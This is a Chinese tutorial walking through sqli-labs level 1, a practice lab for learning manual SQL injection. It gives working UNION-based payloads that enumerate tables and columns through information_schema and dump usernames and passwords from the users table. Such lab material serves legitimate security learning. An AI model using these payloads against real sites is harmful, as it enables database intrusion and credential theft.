sqli-labs第一关

方法一：手工注入

来到第一关，图上说我们需要一个数字的参数

于是我们先手工注入?id=1 and 1=1 跟?id=1 and 1=2发现页面没有报错

每张截图上面页面中有select查询语句，这是我在第一关的源码中加上了echo "$sql ";　　为了能够跟清楚的了解sql注入的原理

于是我们来判断一下是否为字符型注入，尝试?id=1'发现页面报错，此题应该为字符型注入

于是我们拼接字符串?id=1' and '1'='1页面回显正常

然后我们使用order by来确定表中的列数，为什么我们要确定表中字段的列数呢？是因为我们的union联合查询

联合查询特点：

1、要求多条查询语句的查询列数是一致的！ 2、要求多条查询语句的查询的每一列的类型和顺序最好一致 3、union关键字默认去重，如果使用union all 可以包含重复项

于是我们构造?id=1' and '1'='1' order by 1--+　　页面回显正常

　　　　　　?id=1' and '1'='1' order by 2--+　　页面回显正常

　　　　　　?id=1' and '1'='1' order by 3--+　　页面回显正常

　　　　　　?id=1' and '1'='1' order by 4--+　　出现报错界面

然后我们就确定了字段数，于是用联合查询?id=-1' union select 1,2,3--+　　　　(将id弄成一个负数的值，使前面的语句失效)然后看看union查询是否有回显位

这样我们就看到了2，3这两个回显位

然后我们利用union查询，查看数据库的版本和数据库名,这里面我们再补充点知识点

version():查看数据库版本

database():查看使用的数据库

user():查看当前用户

limit:limit子句分批来获取所有数据

group_concat():一次性获取所有的数据库信息

当我们简单了解了这个之后，我们再进行下面的步骤，相信大家有了深刻的理解

接下来利用这两个回显位来查询数据库，和数据库版本信息

?id=-1' union select 1,database(),version()--+

然后我们知道了数据库是security，版本信息：5.7.26

再爆表之前我们先了解一波知识点：

information_schema.tables:包含了数据库里所有的表

table_name:表名

table_schema:数据库名

column_name:字段名

然后我们利用union查询来爆出表面宁

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

于是我们爆出了表名

然后，由我们正常的思维，我们的账号和密码肯定在一张表上，我们看到了users表，

于是我们查看一下这张表的字段名

?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

我们看到了username和password字段，

然后我们就去查询字段信息

?id=-1' union select 1,2,group_concat(0x5c,username,0x5c,password) from users--+